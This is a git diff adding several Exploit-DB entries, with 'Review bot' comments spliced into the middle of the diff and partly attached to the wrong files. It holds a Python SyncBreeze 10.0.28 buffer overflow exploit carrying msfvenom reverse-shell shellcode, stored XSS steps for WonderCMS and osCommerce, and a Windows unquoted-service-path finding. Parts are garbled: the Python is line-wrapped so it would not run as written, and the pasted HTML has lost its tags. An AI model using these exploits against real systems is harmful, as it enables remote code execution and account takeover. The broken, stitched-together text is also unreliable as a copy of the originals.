diff --git a/exploits/php/webapps/49102.txt b/exploits/php/webapps/49102.txt
new file mode 100644
index 000000000..85afb2c42
--- /dev/null
+++ b/exploits/php/webapps/49102.txt
@@ -0,0 +1,22 @@
+# Exploit Title: WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting
+# Date: 20-11-2020
+# Exploit Author: Mayur Parmar
+# Vendor Homepage: https://www.wondercms.com/
+# Version: 3.1.3
+# Tested on: PopOS
+
+Stored Cross-site scripting(XSS):
+Stored attacks are those where the injected script is permanently stored on the target servers,
+such as in a database, in a message forum, visitor log, comment field, etc.
+The victim then retrieves the malicious script from the server when it requests the stored information.
+Stored XSS is also sometimes referred to as Persistent XSS.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Page keywords and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Page Title.
+
+Steps-To-Reproduce:
+1. Go to the Simple website builder.
+2. Put this payload in Page keywords: Mayur">
+3. Now go to the website and the XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49103.txt b/exploits/php/webapps/49103.txt
new file mode 100644
index 000000000..3d78d40cd
--- /dev/null
+++ b/exploits/php/webapps/49103.txt
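Review bot: The `Vulnerable Parameters: Page Title.` line disagrees with the attack-vector paragraph, step 2 and the `'page'` in the title, which all point at the page keywords field, so a reader cannot tell which input is the sink; one of them should be corrected, e.g. `Vulnerable Parameters: Page keywords.` if the steps are the accurate part. The step-2 payload also appears to have lost its markup in this copy (`Mayur">` stops mid-attribute), which is worth checking against the original submission. A closing line naming the remediation — output-encoding the stored keyword/title value wherever it is rendered into the page — would make the entry useful to defenders as well as testers.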
@@ -0,0 +1,112 @@
+# Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting
+# Date: 2020-11-19
+# Exploit Author: Emre Aslan
+# Vendor Homepage: https://www.oscommerce.com/
+# Version: 2.3.4.1
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Login to admin panel.
+2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new
+3- Enter the XSS payload into the title section and save it.
+
+==> Vulnerable Parameter <==
+
+title= (post parameter)
+
+==> HTTP Request <==
+
+POST /catalog/admin/newsletters.php?action=insert HTTP/1.1
+Host: (HOST)
+Connection: keep-alive
+Content-Length: 123
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://(HOST)/
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://(HOST)/catalog/admin/newsletters.php?action=new
+Accept-Encoding: gzip, deflate, br
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: osCAdminID=s11ou44m0vrasducn78c6sg
+
+module=newsletter&title=">&content=xss
+
+==> Vulnerable Source Code <==
+
+
+ + + + + + + +
+ + + + +
Newsletter Manager
+ + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
NewslettersSizeModuleSentStatusAction 
Preview ">3 bytesnewsletterFalseUnlocked 
Preview ">7 bytesnewsletterFalseUnlockedInfo 
+ + + + + + + +
Displaying 1 to 2 (of 2 newsletters)Page 1 of 1
New Newsletter
+ + + + +
">
+ + + + + + + +
PreviewLock

Date Added: 11/19/2020
+
+
\ No newline at end of file
diff --git a/exploits/windows/local/49101.txt b/exploits/windows/local/49101.txt
new file mode 100644
index 000000000..bafbade3e
--- /dev/null
+++ b/exploits/windows/local/49101.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path
+# Date: 2020-11-24
+# Exploit Author: Luis Sandoval
+# Vendor Homepage: https://www.wondershare.com/
+# Software Link: https://www.wondershare.com/drfone/
+# Version: 10.7.1.321
+# Tested on: Windows 10 Home Single Language x64 Esp
+
+# Service info:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe Auto
+
+C:\Users\user>sc qc ElevationService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ElevationService
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Wondershare Driver Install Service help
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/webapps/49104.py b/exploits/windows/webapps/49104.py
new file mode 100755
index 000000000..68029247d
--- /dev/null
+++ b/exploits/windows/webapps/49104.py
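Review bot: The captured request in this hunk carries what looks like a live admin session identifier, `Cookie: osCAdminID=s11ou44m0vrasducn78c6sg`, while host names in the same request are already masked as `(HOST)`; the cookie value should be masked the same way before the file is archived. The "Vulnerable Source Code" section is the rendered Newsletter Manager page (`Displaying 1 to 2 (of 2 newsletters)`, `Date Added: 11/19/2020`) rather than the PHP line that emits `title` without encoding, so the actual sink is never shown; quoting the emitting line, or at least naming the file, would let a reader verify the finding. The pasted HTML also appears to have lost its tags in this copy, so the echoed payload cannot be read back from the listing.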
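Review bot: The writeup ends at the `sc qc` output and never states the remediation, so a defender reading the entry has to infer it; a closing line such as `Fix: quote the service binary path (ImagePath) so the spaces in "C:\Program Files (x86)\..." are not treated as argument separators.` would complete it. The risk is also left implicit: the output shows `NOMBRE_INICIO_SERVICIO: LocalSystem` and `TIPO_INICIO : 2 AUTO_START`, and spelling out that the service auto-starts as SYSTEM is what makes the unquoted path matter. The `sc` output is Spanish-localised (`NOMBRE_RUTA_BINARIO` is `BINARY_PATH_NAME`), which a short note would save readers from guessing.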
@@ -0,0 +1,70 @@ +# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow +# Date: 18-Sep-2020 +# Exploit Author: Abdessalam king(A.salam) +# Vendor Homepage: http://www.syncbreeze.com +# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe +# Version: 10.0.28 +# Tested on: Windows 7,windows xp,windows 10 +#72413372 [*] Exact match at offset 520 +#jmp esp FFE4 \xff\xe4 +#!mona modules +#!mona find -s "\xff\xe4" -m libspp.dll +#address esp => 10090C83 +#badchars ==> "\x00\x0a\x0d\x25\x26\x2b\x3d" +#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c +-b "\x00\x0a\x0d\x25\x26\x2b\x3d" EXITFUNC=thread +#!/usr/bin/python +import socket + +shell ="" +shell +="\xba\x4b\x38\x98\x39\xdd\xc7\xd9\x74\x24\xf4\x5f\x33\xc9\xb1" +shell +="\x53\x83\xef\xfc\x31\x57\x10\x03\x57\x10\xa9\xcd\x64\xd1\xaf" +shell +="\x2e\x95\x22\xcf\xa7\x70\x13\xcf\xdc\xf1\x04\xff\x97\x54\xa9" +shell +="\x74\xf5\x4c\x3a\xf8\xd2\x63\x8b\xb6\x04\x4d\x0c\xea\x75\xcc" +shell +="\x8e\xf0\xa9\x2e\xae\x3b\xbc\x2f\xf7\x21\x4d\x7d\xa0\x2e\xe0" +shell +="\x92\xc5\x7a\x39\x18\x95\x6b\x39\xfd\x6e\x8a\x68\x50\xe4\xd5" +shell +="\xaa\x52\x29\x6e\xe3\x4c\x2e\x4a\xbd\xe7\x84\x21\x3c\x2e\xd5" +shell +="\xca\x93\x0f\xd9\x39\xed\x48\xde\xa1\x98\xa0\x1c\x5c\x9b\x76" +shell +="\x5e\xba\x2e\x6d\xf8\x49\x88\x49\xf8\x9e\x4f\x19\xf6\x6b\x1b" +shell +="\x45\x1b\x6a\xc8\xfd\x27\xe7\xef\xd1\xa1\xb3\xcb\xf5\xea\x60" +shell +="\x75\xaf\x56\xc7\x8a\xaf\x38\xb8\x2e\xbb\xd5\xad\x42\xe6\xb1" +shell +="\x02\x6f\x19\x42\x0c\xf8\x6a\x70\x93\x52\xe5\x38\x5c\x7d\xf2" +shell +="\x3f\x77\x39\x6c\xbe\x77\x3a\xa4\x05\x23\x6a\xde\xac\x4b\xe1" +shell +="\x1e\x50\x9e\x9c\x15\xf7\x70\x83\xd7\x6d\x71\x29\x2a\x1a\x9b" +shell +="\xa2\xf5\x3a\xa4\x68\x9e\xd3\x58\x93\xbe\xb3\xd5\x75\xaa\xa3" +shell +="\xb3\x2e\x43\x06\xe0\xe6\xf4\x79\xc3\x8c\x3b\xf0\xb3\xd9\xd3" +shell +="\x4c\xaa\xde\xdc\x4c\xf9\x48\x4b\xc7\xed\x4c\x6a\xd8\x38\xe5" +shell 
+="\xfb\x4f\xb7\x64\x49\xf1\xc8\xac\x3b\xf1\x5c\x4b\xea\xa6\xc8" +shell +="\x51\xcb\x81\x57\xa9\x3e\x92\x9f\x55\xbf\xb8\xd4\x60\x55\x83" +shell +="\x82\x8c\xb9\x03\x52\xdb\xd3\x03\x3a\xbb\x87\x57\x5f\xc4\x1d" +shell +="\xc4\xcc\x51\x9e\xbd\xa1\xf2\xf6\x43\x9c\x35\x59\xbb\xcb\x45" +shell +="\x9e\x43\x8d\x4e\x5e\x87\x58\x97\x15\xee\x59\xac\x36\xed\x77" +shell +="\xd9\xde\xa8\x12\x60\x83\x4a\xc9\xa7\xba\xc8\xfb\x57\x39\xd0" +shell +="\x8e\x52\x05\x56\x63\x2f\x16\x33\x83\x9c\x17\x16"; + + +payload = "username=AAAAA&password="+"A"*520+"\x83\x0c\x09\x10"+ "\x90" * +20 + shell +"\x90"*(1400-520-4-20-len(shell)) +req ="" +req += "POST /login HTTP/1.1\r\n" +req += "Host: 192.168.1.20\r\n" +req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0\r\n" +req += "Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +req += "Accept-Language: en-US,en;q=0.5\r\n" +req += "Accept-Encoding: gzip, deflate\r\n" +req += "Referer: http://192.168.1.20/login\r\n" +req += "Content-Type: application/x-www-form-urlencoded\r\n" +req += "Content-Length: "+str(len(payload))+"\r\n" +req += "Connection: keep-alive\r\n" +req += "Upgrade-Insecure-Requests: 1\r\n" +req += "\r\n" +req += payload +# print req +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect(("192.168.1.20",80)) +s.send(req) +print s.recv(1024) + +s.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 29cfa77c7..1760597e3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
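Review bot: The script appears to have been mail-wrapped before it was committed: the `#!/usr/bin/python` shebang sits after the comment header instead of on line 1, the `-b "\x00\x0a\x0d\x25\x26\x2b\x3d" EXITFUNC=thread` continuation of the msfvenom comment is not itself commented, and the `User-Agent` and `Accept` string literals are broken across two lines, so the archived copy does not match the submission and would not parse as written. The original line breaks should be restored before the file is indexed. The `print req` and `print s.recv(1024)` statements also pin it to Python 2, which is worth stating in the header (for example on the `# Tested on:` line) since the shebang does not name a version.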
@@ -11206,6 +11206,7 @@ id,file,description,date,author,type,platform,port
 49088,exploits/windows/local/49088.py,"Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit",2020-11-20,stresser,local,windows,
 49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis Martínez",local,windows,
 49100,exploits/windows/local/49100.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-11-24,MasterVlad,local,windows,
+49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43326,3 +43327,6 @@ id,file,description,date,author,type,platform,port
 49097,exploits/hardware/webapps/49097.txt,"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)",2020-11-24,maj0rmil4d,webapps,hardware,
 49098,exploits/php/webapps/49098.txt,"OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated)",2020-11-24,"Hemant Patidar",webapps,php,
 49099,exploits/php/webapps/49099.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2020-11-24,"Hemant Patidar",webapps,php,
+49102,exploits/php/webapps/49102.txt,"WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting",2020-11-25,"Mayur Parmar",webapps,php,
+49103,exploits/php/webapps/49103.txt,"osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting",2020-11-25,"Emre Aslan",webapps,php,
+49104,exploits/windows/webapps/49104.py,"SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow",2020-11-25,"Abdessalam king",webapps,windows,